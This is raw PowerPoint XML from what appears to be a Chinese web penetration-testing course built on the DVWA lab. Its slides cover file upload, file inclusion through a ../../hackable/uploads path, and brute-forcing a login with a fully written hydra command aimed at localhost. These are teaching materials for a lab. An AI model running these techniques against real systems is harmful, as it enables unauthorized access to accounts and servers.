          <p:cNvPr id="6" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62F728DA-1F3E-4A88-A55F-51FD0DFECD1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="26121" r="25764"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4903980" y="135996"/>
            <a:ext cx="6756581" cy="6564519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424889029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文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>读取</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2008805"/>
            <a:ext cx="11603902" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷，而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马，病毒，恶意脚本或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等。这种攻击方式是最为直接和有效的，“文件上传”本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重的后果。	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件上传服务对用户上传的文件没有进行过滤或过滤不全面，导致用户可以上传任意文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25843915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文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>读取</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2008805"/>
            <a:ext cx="11603902" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>脚本文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{633CAC95-F5BF-4A57-B2DC-F8D80C646298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="25968" r="25766"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4621762" y="65900"/>
            <a:ext cx="6742923" cy="6859597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144733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2050"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165600"/>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2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="972516"/>
            <a:ext cx="7200800" cy="5441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介绍</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>信息收集</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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后门</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内网渗透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社会工程学</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检测</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endParaRPr lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="2409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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5333" spc="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29368078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文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>读取</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2008805"/>
            <a:ext cx="3924808" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上传成功后通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>访问执行上传的脚本。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D213021A-F74F-4534-8012-828CB894D097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="23983" r="25459"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183898" y="30865"/>
            <a:ext cx="6404721" cy="6827135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21276025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文件包含</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="1595021"/>
            <a:ext cx="5517232" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件包含漏洞是一种最常见的漏洞类型，它会影响依赖于脚本运行时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时，文件包含漏洞会导致攻击者任意控制运行时执行的文件。如果一个文件包含这个漏洞，为了方便起见，经常在开发阶段就实施。由于它经常用于程序开发阶段，所以这就为后来的攻击埋下了伏笔并导致了各种基于文件的攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>网页代码会包含进参数文件名所对应的文件并执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{712B648E-E725-43D7-B8D6-2E86BDE48AD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="24747" r="25764"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5660571" y="153701"/>
            <a:ext cx="6531429" cy="6704299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22359401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文件包含</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="1595021"/>
            <a:ext cx="5517232" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>参数中传输在文件上传漏洞中上传的脚本文件，文件地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../hackable/uploads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>则网页代码将用户自定义上传的脚本包含并执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{228ABBC2-8CAB-4F0C-BC16-452C42507943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="24288" r="25306"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5660571" y="81619"/>
            <a:ext cx="6531429" cy="6776382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314327803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后台</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="1529707"/>
            <a:ext cx="5517232" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>爆破</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>hydra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是世界顶级密码暴力密码破解工具，支持几乎所有协议的在线密码破解，功能强大，其密码能否被破解关键取决于破解字典是否足够强大。在网络安全渗透过程中是一款必备的测试工具，配合社工库进行社会工程学攻击，有时会获得意想不到的效果。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>由于网页没有限定密码错误的重复次数因此可以无限尝试，直到获取正确的密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A92EDA34-BD0D-486F-8338-48586D27C495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="25968" r="25766" b="11667"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5859624" y="600933"/>
            <a:ext cx="6332376" cy="6257068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21673659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后台</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="1837617"/>
            <a:ext cx="11669216" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>破解密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra -l admin -P ~/Tools/Dictionary/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-dictionary/common.txt -e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 127.0.0.1 http-get-form "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/vulnerabilities/brute/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.php:username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=^USER^&amp;password=^PASS^&amp;Login=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login:Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and/or password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incorrect.:H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=Cookie: security=low; PHPSESSID=krv29q0fj887mc0n14bocarl26"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE86CAB1-EEF4-49AA-8D79-DCDBE853EB9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="4145941"/>
            <a:ext cx="8778737" cy="2496947"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B35A6F67-B64E-4040-A311-699E943835A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
